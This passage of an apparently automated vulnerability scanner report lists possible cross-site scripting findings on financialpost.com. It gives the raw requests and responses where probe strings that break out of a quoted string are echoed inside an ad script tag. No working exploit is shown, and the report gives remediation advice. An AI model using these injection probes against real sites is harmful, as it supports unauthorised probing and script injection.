This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets5926e'%3b02d83b6f42d/funds/profile/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43501


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets5926e';02d83b6f42d/funds/profile/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets5926e';02d83b6f42d;kw=funds;kw=profile;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68820856?">
...[SNIP]...

1.140. http://www.financialpost.com/markets/funds/profile/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/funds/profile/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3ad1'%3bf27dab35307 was submitted in the REST URL parameter 2. This input was echoed as f3ad1';f27dab35307 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/fundsf3ad1'%3bf27dab35307/profile/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43465


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/fundsf3ad1';f27dab35307/profile/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=fundsf3ad1';f27dab35307;kw=profile;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=88357887?">
...[SNIP]...

1.141. http://www.financialpost.com/markets/funds/profile/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/funds/profile/index.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e927'%3b27cd8eb768f was submitted in the REST URL parameter 3. This input was echoed as 1e927';27cd8eb768f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/funds/profile1e927'%3b27cd8eb768f/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43430


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/funds/profile1e927';27cd8eb768f/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=funds;kw=profile1e927';27cd8eb768f;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=67456820?">
...[SNIP]...

1.142. http://www.financialpost.com/markets/funds/profile/index.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/funds/profile/index.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6620c'%3bf0f4d8bb4e8 was submitted in the REST URL parameter 4. This input was echoed as 6620c';f0f4d8bb4e8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/funds/profile/6620c'%3bf0f4d8bb4e8 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43497


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/funds/profile/6620c';f0f4d8bb4e8/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=funds;kw=profile;kw=6620c';f0f4d8bb4e8;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=93927840?">
...[SNIP]...

1.143. http://www.financialpost.com/markets/futures/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/futures/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e18f6'%3bf39282e7ad7 was submitted in the REST URL parameter 1. This input was echoed as e18f6';f39282e7ad7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /marketse18f6'%3bf39282e7ad7/futures/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36515


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/marketse18f6';f39282e7ad7/futures/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=marketse18f6';f39282e7ad7;kw=futures;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=17941583?">
...[SNIP]...

1.144. http://www.financialpost.com/markets/futures/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/futures/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c53f'%3b3da8e6e0e07 was submitted in the REST URL parameter 2. This input was echoed as 5c53f';3da8e6e0e07 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/futures5c53f'%3b3da8e6e0e07/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43296


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/futures5c53f';3da8e6e0e07/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=futures5c53f';3da8e6e0e07;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=14169631?">
...[SNIP]...

1.145. http://www.financialpost.com/markets/idms-terms.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/idms-terms.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26105'%3bf9077ffe571 was submitted in the REST URL parameter 1. This input was echoed as 26105';f9077ffe571 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets26105'%3bf9077ffe571/idms-terms.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43169


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets26105';f9077ffe571/idms-terms;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets26105';f9077ffe571;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=67880817?">
...[SNIP]...

1.146. http://www.financialpost.com/markets/idms-terms.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/idms-terms.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74189'%3b8943533dea2 was submitted in the REST URL parameter 2. This input was echoed as 74189';8943533dea2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/74189'%3b8943533dea2 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36339


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/74189';8943533dea2/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=74189';8943533dea2;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=98767196?">
...[SNIP]...

1.147. http://www.financialpost.com/markets/key-numbers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/key-numbers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 968a1'%3b5e5fba5ddd0 was submitted in the REST URL parameter 1. This input was echoed as 968a1';5e5fba5ddd0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets968a1'%3b5e5fba5ddd0/key-numbers/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43412


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets968a1';5e5fba5ddd0/key-numbers/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets968a1';5e5fba5ddd0;kw=key-numbers;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=13519179?">
...[SNIP]...

1.148. http://www.financialpost.com/markets/key-numbers/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/key-numbers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8136'%3bb70724e675e was submitted in the REST URL parameter 2. This input was echoed as e8136';b70724e675e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/key-numberse8136'%3bb70724e675e/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43375


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/key-numberse8136';b70724e675e/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=key-numberse8136';b70724e675e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=44882526?">
...[SNIP]...

1.149. http://www.financialpost.com/markets/news-alerts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/news-alerts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ede9'%3bbdd4c280d2b was submitted in the REST URL parameter 1. This input was echoed as 1ede9';bdd4c280d2b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets1ede9'%3bbdd4c280d2b/news-alerts/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43411


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets1ede9';bdd4c280d2b/news-alerts/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets1ede9';bdd4c280d2b;kw=news-alerts;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68820856?">
...[SNIP]...

1.150. http://www.financialpost.com/markets/news-alerts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/news-alerts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49f35'%3b67eccc5e32c was submitted in the REST URL parameter 2. This input was echoed as 49f35';67eccc5e32c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/news-alerts49f35'%3b67eccc5e32c/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36559


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/news-alerts49f35';67eccc5e32c/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=news-alerts49f35';67eccc5e32c;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=66733803?">
...[SNIP]...

1.151. http://www.financialpost.com/markets/news/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/news/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d964b'%3bf411e228aea was submitted in the REST URL parameter 1. This input was echoed as d964b';f411e228aea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /marketsd964b'%3bf411e228aea/news/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43272


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/marketsd964b';f411e228aea/news/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=marketsd964b';f411e228aea;kw=news;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34439305?">
...[SNIP]...

1.152. http://www.financialpost.com/markets/news/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/news/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16774'%3b529b04d3c55 was submitted in the REST URL parameter 2. This input was echoed as 16774';529b04d3c55 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/news16774'%3b529b04d3c55/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43236


...[SNIP]...
